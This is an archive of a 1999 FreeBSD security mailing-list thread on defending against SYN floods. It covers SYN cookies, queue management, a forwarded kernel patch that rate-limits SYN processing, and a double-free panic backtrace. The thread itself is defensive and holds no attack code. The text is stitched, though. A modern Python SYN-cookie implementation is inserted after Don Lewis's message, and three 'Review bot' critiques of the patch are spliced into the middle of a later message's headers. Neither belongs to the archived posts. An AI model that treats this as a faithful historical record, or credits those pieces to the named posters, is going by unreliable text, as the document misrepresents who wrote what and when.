freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 6129C154AD for ; Thu, 13 May 1999 21:38:24 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id VAA97604; Thu, 13 May 1999 21:38:16 -0700 (PDT) (envelope-from dillon) Date: Thu, 13 May 1999 21:38:16 -0700 (PDT) 
From: Matthew Dillon Message-Id: <199905140438.VAA97604@apollo.backplane.com> To: Brett Glass Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD References: <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :How often are the IP addresses spoofed during SYN floods? (I know :it's perfectly practical to do so, since the flooder doesn't :care about responses, but routers may preclude it.) : :It could be that discarding SYNS from addresses that send excessive :numbers of them would let the legitimate folk keep working. : :As a backup, there could also be a random discard mechanism. : :--Brett IP addresses are usually spoofed during SYN Floods. They are typically either random or sequentially incrementing. The newer flooding programs randomize the source IP address. It is impossible to tell the difference between a SYN spoof and a real SYN. Putting code in to handle excessive SYNs from a particular IP address is a waste of time, IMHO. The only way to fix a SYN flood is for routers to automatically test the source IP against the source interface on a global scale. The only way to mitigate the SYN flooding problem on the host side is to greatly increase the size of the listen queue, but even this does not work too well. 
-Matt Matthew Dillon :At 10:21 PM 5/13/99 -0400, Jared Mauch wrote: :> What would be ideal is to have a fair-queue such as this: :> :> real-queue = 16 :> extended-queue = 32 :> :> once the real-queue fills with syns, fill the extended :>queue, (these are folks that need syn-ack, btw), once the :>extended queue fills, begin sequentially dropping elements from the :>real-queue :> :> index++; :> index = index%16; :> drop(real_q[index]); :> move(real_q[index], extend_q[index]); :> (making extend_q[index] avail for the current syn to be put in) :> :> and sequentially add elements from index on :> :> if there is nothing in extend_q[index], you should not need :>to drop real_q[index] :> :> (I picked 16 & 32 as arbitary numbers, those can obviously :>be any size, preferably equal); :> :> Obviously, doing prefered drops (based on dst port on our side), :>ie: we have 200 syns for port 80, but only 3 for port 22, deal with the :>3 that are not causing a problem first, so we can get ssh in, but let the :>web folks go a bit slower. :> :> Doing truly random drops are always better, but on the average server :>will induce more load than you'll save (IMHO). :> :> - jared :> :>On Thu, May 13, 1999 at 06:27:13PM -0700, Thamer Al-Herbish wrote: :> > On Thu, 13 May 1999, Brett Glass wrote: :> > :> > > available (default to 100). This is the maximium number of SYNs per second :> > > that will be processed, the rest will be silently discarded. On my test :> > :> > If I'm reading this correctly, it would not be very effective. I :> > believe the OpenBSD fix was to randomly drop ports per a syn flooded :> > port. So it would be "fair." Dropping all SYNs after a number of SYNs :> > come in seems to be counter productive. :> > :> > Or does this actually work? 
:> > :> > -- :> > Thamer Al-Herbish PGP public key: :> > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt :> > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] :> > :> > :> > :> > To Unsubscribe: send mail to majordomo@FreeBSD.org :> > with "unsubscribe freebsd-security" in the body of the message :> :>-- :>Jared Mauch | pgp key available via finger from jared@puck.nether.net :>clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 22:26:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id 71B90154C8 for ; Thu, 13 May 1999 22:26:49 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id HAA20794; Fri, 14 May 1999 07:25:46 +0200 (CEST) Message-ID: <19990514072546.A20779@foobar.franken.de> Date: Fri, 14 May 1999 07:25:46 +0200 
From: Harold Gutch
To: Matthew Dillon , Brett Glass
Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
References: <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <199905140438.VAA97604@apollo.backplane.com>; from Matthew Dillon on Thu, May 13, 1999 at 09:38:16PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, May 13, 1999 at 09:38:16PM -0700, Matthew Dillon wrote:
> The only way to mitigate the SYN flooding problem on the host side is to
> greatly increase the size of the listen queue, but even this does not work
> too well.
>

What about the Linux way of doing it, that is by creating an MD5-hash over the source and destination IP and port and a secret which is incremented say every minute and using the result as a base for your own sequence number. You don't lose a socket before you get the third handshake packet and you can verify the sequence number using MD5 again.

I found this idea to be quite interesting when reading about it the first time, and I currently don't see any negative side effects from it.

The FreeBSD approach (just discarding the oldest socket in SYN_RCVD state when the backlog gets too high) works often enough as well, but might cause problems if the flooder sends you more SYNs than your backlog can handle in a shorter timeframe than your SYN|ACK needs for its way back to somebody who tries to establish a normal connection and his answer back to you takes.

bye,
Harold

--
Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar 4 04:53:33 CET 1998 #unix, ircnet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 22:46:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 5583B152A3 for ; Thu, 13 May 1999 22:46:25 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id WAA25855; Thu, 13 May 1999 22:46:12 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id WAA18480; Thu, 13 May 1999 22:46:10 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id WAA06542; Thu, 13 May 1999 22:46:09 -0700 (PDT) 
From: Don Lewis Message-Id: <199905140546.WAA06542@salsa.gv.tsc.tdk.com> Date: Thu, 13 May 1999 22:46:09 -0700 In-Reply-To: Thamer Al-Herbish "Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD" (May 13, 7:37pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 13, 7:37pm, Thamer Al-Herbish wrote: } Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD } Btw, if it matters any I liked Bernstein's syn cookies. The only } conceivable problem there was storing initial TCP option information } which could not be done because of the cookie-response design. } } Quick summary of syn cookies: } } You would send back a cookie as one the sequence number based on a } secret that changes every so often hashed with the clients initial } sequence number. If you get back a SYN-ACK, you check it against the } same hash, and a match means you can respond and finish the } handshake. You effectively _never_ store information about the first } SYNs and thus _never_ have to worry about resources. TCBs are } created after the hand shake is completed. One potential danger is that you can't totally block incoming connections to vulnerable ports by filtering out incoming SYN packets. If an attacker can guess what sequence number you would have sent in a SYN-ACK, he can establish a connection by just sending the third packet in the initial three-way handshake. This isn't especially easy to brute force because the sequence space is a 32 bit number, but it's not totally unreasonable either if the attacker is patient enough. The attacker may also be able to make better guesses if he knows the details of the implementation he is attacking. 
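The scheme Thamer summarises and Harold describes, with the third-packet check Don Lewis raises, as an added illustration that is not code from any poster or from the FreeBSD kernel: a stateless listener mints a 32-bit cookie from a keyed MD5 over the 4-tuple, the client's ISN and a minute counter, and verifies it from the bare ACK segment. The bit layout (5-bit counter tag, 27-bit MAC), the two-minute acceptance window, the fixed secret and the fake clock are assumptions made for the demo.

```python
import hashlib
import hmac
import os
import struct
import time

# Cookie layout assumed for this illustration (Bernstein's split, with his
# 3-bit MSS index folded into the MAC since no options are stored here):
#   bits 31..27  minute counter mod 32, so the verifier knows which secret epoch
#   bits 26..0   truncated keyed MD5 over (4-tuple, client ISN, counter)
COUNTER_BITS = 5
MAC_BITS = 32 - COUNTER_BITS
MAC_MASK = (1 << MAC_BITS) - 1
ROTATE_SECONDS = 60      # Harold: a secret "incremented say every minute"
MAX_COOKIE_AGE = 2       # accept cookies minted under the current or previous counter


class SynCookieListener:
    """Stateless SYN handling: no TCB exists until the third packet verifies."""

    def __init__(self, secret=None, clock=time.time):
        self.secret = secret if secret is not None else os.urandom(16)
        self.clock = clock

    def _counter(self):
        return int(self.clock() // ROTATE_SECONDS)

    def _mac(self, counter, saddr, sport, daddr, dport, client_isn):
        # Both addresses, both ports, the client's ISN and the counter go into
        # the hash; the secret is the HMAC key, so seeing the packets does not
        # let anyone recompute the value (Thamer's "hash is not reversible").
        msg = struct.pack(">4sH4sHIQ", saddr, sport, daddr, dport, client_isn, counter)
        digest = hmac.new(self.secret, msg, hashlib.md5).digest()
        return int.from_bytes(digest[:4], "big") & MAC_MASK

    def syn_received(self, saddr, sport, daddr, dport, client_isn):
        """SYN arrives: return the ISN for our SYN-ACK and store nothing."""
        counter = self._counter()
        tag = counter % (1 << COUNTER_BITS)
        return (tag << MAC_BITS) | self._mac(counter, saddr, sport, daddr, dport, client_isn)

    def ack_received(self, saddr, sport, daddr, dport, seq, ack):
        """Third packet: seq is the client ISN + 1, ack is our cookie + 1.
        True means the cookie verifies and a TCB may now be allocated; False
        means drop the segment. Only the packet itself is consulted, which is
        why a flood of SYNs costs this listener no memory at all."""
        cookie = (ack - 1) & 0xFFFFFFFF
        client_isn = (seq - 1) & 0xFFFFFFFF
        tag = cookie >> MAC_BITS
        now = self._counter()
        for age in range(MAX_COOKIE_AGE):
            counter = now - age
            if counter % (1 << COUNTER_BITS) != tag:
                continue
            expected = self._mac(counter, saddr, sport, daddr, dport, client_isn)
            # Constant-time compare of the MAC field.
            return hmac.compare_digest(struct.pack(">I", expected),
                                       struct.pack(">I", cookie & MAC_MASK))
        return False   # tag belongs to a counter outside the acceptance window


def demo():
    """Constructed handshake traffic: an honest client, a forged third packet
    sent with no preceding SYN (Don Lewis's concern), and the same cookie
    replayed after the secret window has passed. Returns three booleans."""
    clock = [1_000_000.0]   # controllable clock so the demo can advance time
    srv = SynCookieListener(secret=b"constructed-demo-secret", clock=lambda: clock[0])
    four_tuple = dict(saddr=bytes([10, 0, 0, 7]), sport=40000,
                      daddr=bytes([192, 0, 2, 1]), dport=80)
    client_isn = 0x12345678

    cookie = srv.syn_received(**four_tuple, client_isn=client_isn)
    honest = srv.ack_received(**four_tuple, seq=client_isn + 1, ack=cookie + 1)

    # A blind third packet has to hit one of 2**MAC_BITS values per accepted
    # counter; the acceptance window and MAC width, not the full 32-bit
    # sequence space, bound that effort. One wrong MAC bit is rejected.
    forged = srv.ack_received(**four_tuple, seq=client_isn + 1, ack=(cookie ^ 1) + 1)

    # Three minutes later the counter has moved past MAX_COOKIE_AGE.
    clock[0] += 3 * ROTATE_SECONDS
    stale = srv.ack_received(**four_tuple, seq=client_isn + 1, ack=cookie + 1)
    return honest, forged, stale


if __name__ == "__main__":
    print(demo())   # (True, False, False)
```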
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 22:53:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 31EB01527B for ; Thu, 13 May 1999 22:53:36 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 4901 invoked from network); 14 May 1999 05:53:30 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 05:53:30 -0000 Date: Thu, 13 May 1999 22:52:38 -0700 (PDT) 
From: Thamer Al-Herbish
To: security@FreeBSD.ORG
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
In-Reply-To: <199905140546.WAA06542@salsa.gv.tsc.tdk.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 13 May 1999, Don Lewis wrote:

> to vulnerable ports by filtering out incoming SYN packets. If an attacker
> can guess what sequence number you would have sent in a SYN-ACK, he can
> establish a connection by just sending the third packet in the initial
> three-way handshake. This isn't especially easy to brute force because

The syn-cookie workaround does not make it any easier to guess the sequence number. You would need the actual secret that changes every so often to come up with it. This secret is hashed with the ISN from the packet and the addresses on the packet. Knowing the ISN and the addresses is irrelevant because the hash is not reversible. Unless the interval where the secret would change was exceptionally long, it is doubtful you can crack a 32-bit secret.

My understanding of the syn cookie mechanism leads me to believe that it is not possible to brute force it with conventional computer power. Maybe in a few years with faster computers it would be.
-- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 2:16:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id DAC2B15431 for ; Fri, 14 May 1999 02:16:43 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 61493 invoked by uid 1001); 14 May 1999 09:16:42 +0000 (GMT) To: freebsd-security@freebsd.org Subject: ssh-1.2.27 is out 
From: sthaug@nethelp.no
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Fri, 14 May 1999 11:16:42 +0200
Message-ID: <61491.926673402@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Just FYI: ssh-1.2.27 is out. These are the updates relative to 1.2.26,
according to the ChangeLog.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

----------------------------------------------------------------------
Thu Apr 29 10:46:21 1999  Timo J. Rinne

    * Replaced OSF1/C2 security support with more complete SIA
      (Security Integration Architecture).

Mon Feb 22 10:00:12 1999  Timo J. Rinne

    * Added snprintf from ssh2.
    * Tatu's sprintf -> snprintf fixes.
    * Fixed potential buffer overflows.
    * Kerberos authentication disabled, if client is suid-root. This is
      the only way to avoid security problems that are in Kerberos
      rather than in ssh.

Wed Nov 25 00:04:11 1998  Tatu Ylonen

    * sshd.c (sgi_project_setup): patches from Luigi Pugnetti,
      Eivind Gjelseth, Randolph J. Herber, Sevo Stille.
    * sshd.c (sgi_project_acct_on): patches from Vern Staats,
      staatsvr@asc.hpc.mil.
    * sshd.c (login_permitted): Added support for locked accounts on
      AIX. Thanks to "Delius, Felix von".
    * login.c: Improvements for glibc 2.0.100+ from D.A. Harris.

Tue Nov 24 23:27:20 1998  Tatu Ylonen

    * login.c: Removed assignment to ux.ut_exit.e_{termination,exit},
      because they are already zeroed and the assignment is causing
      problems on some platforms.
    * Fixed uninitialized variable err in sgi_project_setup (from
      Eivind Gjelseth).
    * ssh-agent.c: Fixed -D (from Ian Goldberg).
    * Fixed undefined __udiv_qrnnd bug on Solaris (reported by Karl
      Berry).
    * Fixed a bug in idle timeouts (reported by "David M. Dandarnobody"@nowhere).
    * Fixed deattack.c on Cray (patch from Andreas Schott).
    * Fixed x11 forwarding on SunOS 4.1.4 (gethostbyname bug, reported
      by Bradford Hull).
    * Added snprintf from ssh2. Changed most sprintfs to snprintf.
    * Fixed a hard-to-exploit security bug in Kerberos code.
    * Added length limitations in many sprintfs.

Mon Jul 13 16:23:15 1998  Tero Kivinen

    * Removed extra ux.ut_syslen setting. Reported by Felix von Leitner.

From owner-freebsd-security Fri May 14 10:38: 4 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fed-ef1.frb.gov (fed.frb.gov [132.200.32.32]) by hub.freebsd.org (Postfix) with ESMTP id 326E114C3C; Fri, 14 May 1999 10:37:54 -0700 (PDT) (envelope-from seth@freebie.dp.ny.frb.org)
Received: by fed-ef1.frb.gov; id NAA03605; Fri, 14 May 1999 13:37:49 -0400 (EDT)
Received: from m1pmdf.frb.gov(192.168.3.38) by fed.frb.gov via smap (V4.2) id xma003020; Fri, 14 May 99 13:37:03 -0400
Date: Fri, 14 May 1999 13:36:36 -0400 (EDT)
From: Seth
Subject: SYN floods against FreeBSD (fwd)
To: freebsd-stable@freebsd.org
Cc: security@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Don't know whether this hit the list yet, so I'm passing along. Apologies
if it's old news.

Note: I am not the author of the message; I'm just reposting it here.
Please remove my address from any replies to the -stable mailing list.
Thanks.

SB

---------- Forwarded message ----------
Date: Thu, 13 May 1999 11:35:43 -0700
From: Richard Steenbergen
To: BUGTRAQ@netspace.org
Subject: SYN floods against FreeBSD

Here's a quickie for the people who have been plagued with high bandwidth
SYN flood attacks, a kernel patch for FreeBSD 3.1-STABLE which rate limits
SYN processing. It's messy but functional and I don't have time to make it
better (that's the fbsd developers' job, not mine :P). cd /usr/src/sys,
patch < synlim, add "options SYN_RATELIM" (I highly recommend ICMP_BANDLIM
as well) to your kernel, recompile, and sysctl net.inet.tcp.synlim will be
available (defaults to 100). This is the maximum number of SYNs per second
that will be processed; the rest will be silently discarded. On my test
system (P2 450 running 3.1-stable being hit w/15,000 packets per sec),
this has successfully brought CPU usage from 100% to ~20% (against an open
port which is replying with unacknowledged ACKs).

Which brings us to the more sticky topic of kernel panics when under SYN
flood (which I believe to be the cause of some earlier posts from certain
people at Exodus Communications *cough*).
Lord knows I found enough of them when doing this testing, but the one
that seems to be the biggie for crashing when under SYN flood is as
follows (heh, just turned off the synlim and panic'd within 8 seconds
while writing this):

panic: free: multiple frees
(kgdb) bt
#0  boot (howto=256) at ../../kern/kern_shutdown.c:285
#1  0xc0138c09 in panic (fmt=0xc02192b7 "free: multiple frees")
    at ../../kern/kern_shutdown.c:446
#2  0xc0135aaf in free (addr=0xc0cdd600, type=0xc0239330)
    at ../../kern/kern_malloc.c:333
#3  0xc01768f4 in ifafree (ifa=0xc0cdd600) at ../../net/route.c:262
#4  0xc0176876 in rtfree (rt=0xc34ce700) at ../../net/route.c:236
#5  0xc0176c84 in rtrequest (req=2, dst=0xc34cbac0, gateway=0xc34cbad0,
    netmask=0x0, flags=393223, ret_nrt=0x0) at ../../net/route.c:536
#6  0xc017b34d in in_rtqkill (rn=0xc34ce700, rock=0xc0231610)
    at ../../netinet/in_rmx.c:242
#7  0xc0176064 in rn_walktree (h=0xc0cd9e00, f=0xc017b2fc ,
    w=0xc0231610) at ../../net/radix.c:956
#8  0xc017b3ec in in_rtqtimo (rock=0xc0cd9e00) at ../../netinet/in_rmx.c:283
#9  0xc013d19b in softclock () at ../../kern/kern_timeout.c:124

Which after a quick examination seems to be a periodic routing table
cleanup. It seems that in_rtqtimo is scheduled to run every
net.inet.ip.rtexpire seconds (which is dynamically adjusted and can never
go lower than net.inet.ip.rtminexpire). When the system is under heavy
load from processing lots of small packets (they don't even have to be
SYNs, anything which can get routed will do the trick, though the packet
kiddies would get very little gain from just sending an IP header since
it's going to be padded to 64 bytes for the eth frame anyhow), this route
cleanup code will go whacking at routes it shouldn't and free some memory
twice. In the course of testing I've gotten my rtq_reallyold to -3 and
seen lots of "tvotohz: negative time difference -2 sec 0 usec". Perhaps
someone with free time or more specific knowledge of this area would like
to FIX IT? =)

Perhaps when I get more free time I'll test some other *nix's. I would
really recommend putting all this rate limiting code at an ipfw level.

If you would like to contact me regarding this please use
humble@quadrunner.com (at least if you want a quick reply), thanks.

--
Richard Steenbergen humble@EFNet PGP ID: 0x741D0374
PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374
http://users.quadrunner.com/humble

Content-Type: TEXT/PLAIN; NAME=synlim; CHARSET=US-ASCII
Content-Description: SYN rate limit patch for fbsd 3.1
Content-Disposition: ATTACHMENT; FILENAME=synlim

*** conf/options.old Sat May 15 23:08:03 1999 --- conf/options Sat May 15 23:40:21 1999 *************** *** 68,73 **** --- 68,74 ---- SYSVSHM opt_sysvipc.h UCONSOLE ICMP_BANDLIM + SYN_RATELIM # POSIX kernel options P1003_1B opt_posix.h *** netinet/tcp_var.h.old Sat May 15 23:25:39 1999 --- netinet/tcp_var.h Sat May 15 23:45:05 1999 *************** *** 40,45 **** --- 40,49 ---- * Kernel variables for tcp. */ + #ifdef KERNEL + #include "opt_syn_ratelim.h" + #endif + /* * Tcp control block, one per tcp; fields: * Organized for 16 byte cacheline efficiency. *************** *** 305,311 **** #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_MAXID 12 #define TCPCTL_NAMES { \ { 0, 0 }, \ --- 309,316 ---- #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_SYNLIM 12 /* Rate limiting of SYNs */ !
#define TCPCTL_MAXID 13 #define TCPCTL_NAMES { \ { 0, 0 }, \ *************** *** 320,325 **** --- 325,331 ---- { "recvspace", CTLTYPE_INT }, \ { "keepinit", CTLTYPE_INT }, \ { "pcblist", CTLTYPE_STRUCT }, \ + { "synlim", CTLTYPE_INT }, \ } #ifdef KERNEL *** netinet/tcp_input.c.old Sat May 15 23:08:10 1999 --- netinet/tcp_input.c Sun May 16 01:33:51 1999 *************** *** 72,77 **** --- 72,85 ---- static struct tcpiphdr tcp_saveti; #endif + #ifdef SYN_RATELIM + static int synlim = 100; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RW, &synlim, 0, ""); + #else + static int synlim = -1; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RD, &synlim, 0, ""); + #endif + static int tcprexmtthresh = 3; tcp_seq tcp_iss; tcp_cc tcp_ccgen; *************** *** 98,104 **** struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! /* * Insert segment ti into reassembly queue of tcp with --- 106,112 ---- struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! static int syn_ratelim(void); /* * Insert segment ti into reassembly queue of tcp with *************** *** 130,135 **** --- 138,183 ---- } \ } + #ifdef SYN_RATELIM + int syn_ratelim(void) + { + static int lticks; + static int lpackets; + int dticks; + + /* + * Return ok status if feature disabled or argument out of + * ranage. + */ + + if (synlim <= 0) + return(0); + + dticks = ticks - lticks; + + /* + * reset stats when cumulative dt exceeds one second. 
+ */ + + if ((unsigned int)dticks > hz) { + if (lpackets > synlim) + printf("syn rate limit reached %d/%d pps\n", lpackets, synlim); + lticks = ticks; + lpackets = 0; + } + + /* + * bump packet count + */ + + if (++lpackets > synlim) { + return(-1); + } + + return(0); + } + #endif + static int tcp_reass(tp, ti, m) register struct tcpcb *tp; *************** *** 379,384 **** --- 427,438 ---- ip_fw_fwd_addr = NULL; } else #endif /* IPFIREWALL_FORWARD */ + + #ifdef SYN_RATELIM + if ((tiflags & TH_SYN) && !(tiflags & TH_ACK)) + if (syn_ratelim() < 0) + goto drop; + #endif inp = in_pcblookup_hash(&tcbinfo, ti->ti_src, ti->ti_sport, ti->ti_dst, ti->ti_dport, 1);

From owner-freebsd-security Fri May 14 12:57:47 1999
Delivered-To: freebsd-security@freebsd.org
Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 8A1CE14F31; Fri, 14 May 1999 12:57:31 -0700 (PDT) (envelope-from dillon@apollo.backplane.com)
Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id MAA03794; Fri, 14 May 1999 12:57:31 -0700 (PDT) (envelope-from dillon)
Date: Fri, 14 May 1999 12:57:31 -0700 (PDT)
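Review bot: in the conf/options hunk SYN_RATELIM is listed with no header file name, exactly like the ICMP_BANDLIM line above it, which makes config(8) put the option into opt_global.h, yet the tcp_var.h hunk adds `#include "opt_syn_ratelim.h"`. Check that config(8) actually writes that header in your tree; if it does not, either list the option as `SYN_RATELIM opt_syn_ratelim.h` in conf/options or drop the include, since with opt_global.h the `#ifdef SYN_RATELIM` tests in tcp_input.c already work without it.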
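Review bot: the syn_ratelim() hunk keeps one global lpackets counter shared by every source address and every listening port and drops silently, so as soon as a flood alone exceeds synlim (100/s by default) every legitimate SYN competes for the same slots and most of them are discarded; the patch trades CPU exhaustion for a guaranteed denial of new connections, which the option description should say, or the accounting should be per destination port. Also in this hunk the definition is `int syn_ratelim(void)` inside `#ifdef SYN_RATELIM`, while the prototype added in the earlier hunk is `static int syn_ratelim(void);` and is compiled unconditionally; make the definition `static` and wrap the prototype in the same `#ifdef` so kernels without the option do not carry a declared-but-undefined static function.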
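Review bot: the tcp_input.c call-site hunk is inserted directly after the `} else` that closes the `#ifdef IPFIREWALL_FORWARD` block, so in a kernel with both options the dangling else now binds to the new `if ((tiflags & TH_SYN) && !(tiflags & TH_ACK))` statement and the following `inp = in_pcblookup_hash(...)` is no longer the else branch but runs unconditionally, overwriting the transparent-forwarding lookup; move the rate-limit check above the `#ifdef IPFIREWALL_FORWARD` block or put braces around the original else body. A dropped SYN also leaves no trace apart from the once-a-second printf, so bump a tcpstat counter there as well, otherwise operators cannot tell a flood from ordinary loss.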
From: Matthew Dillon
Message-Id: <199905141957.MAA03794@apollo.backplane.com>
To: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: SYN floods against FreeBSD (fwd)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:Don't know whether this hit the list yet, so I'm passing along. Apologies
:if it's old news.
:
:Note: I am not the author of the message; I'm just reposting it here.
:Please remove my address from any replies to the -stable mailing list.
:Thanks.
:
:SB

Addressing the BUGTRAQ posting and not the messenger :-)

I think this patch is a bad idea. I recall fixing a bug in the route
table code that could cause a double-free panic, but I do not remember
if it was before or after the 3.1 release. In any case, a double-free
panic has nothing to do with a high volume of SYN traffic apart from
ticking some new bug. The appropriate fix is *not* to try to limit the
SYN traffic but instead to track down, locate, and fix the double-free.

I will go over the route table code to see if the softclock interrupt
is being properly masked while the route table is being manipulated.

-Matt

From owner-freebsd-security Fri May 14 13: 6:48 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 2481114E99 for ; Fri, 14 May 1999 13:06:45 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id OAA27906; Fri, 14 May 1999 14:05:58 -0600 (MDT)
Message-Id: <4.2.0.37.19990514133829.0461e220@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Fri, 14 May 1999 14:05:51 -0600
To: Harold Gutch, Matthew Dillon
From: Brett Glass
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
Cc: Jared Mauch, Thamer Al-Herbish, security@FreeBSD.ORG
In-Reply-To: <19990514072546.A20779@foobar.franken.de>
References: <199905140438.VAA97604@apollo.backplane.com> <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Any technique that requires the originator to receive your SYN-ACK and
generate a specific response before you commit resources is acceptable.
Heck, you don't even really need a cryptographically strong hash for
this. Is Linux really doing one MD5 per SYN? If so, I can think of a few
other techniques that would give us a speed advantage. We'd be able to
beat them in the benchmarks while still providing good protection against
SYN flooding.

One question about "the Linux way of doing it" as described below. What
happens if the secret just happens to be modified right after the
SYN-ACK? Could be you'd drop a connection or two that was legitimate.
Seems like you'd need to test against an old AND a new secret to avoid
the race condition, especially in the presence of congestion.

One more point. According to the original BUGTRAQ message, a cleanup
routine is causing problems when the system is under heavy load. At first
glance, this looks like a consistency problem; the code may be traversing
a data structure that changes out from under it. We need to fix this
regardless of how we handle SYN floods.

--Brett

At 07:25 AM 5/14/99 +0200, Harold Gutch wrote:
>On Thu, May 13, 1999 at 09:38:16PM -0700, Matthew Dillon wrote:
> > The only way to mitigate the SYN flooding problem on the host side is to
> > greatly increase the size of the listen queue, but even this does not work
> > too well.
> >
>
>What about the Linux way of doing it, that is by creating an
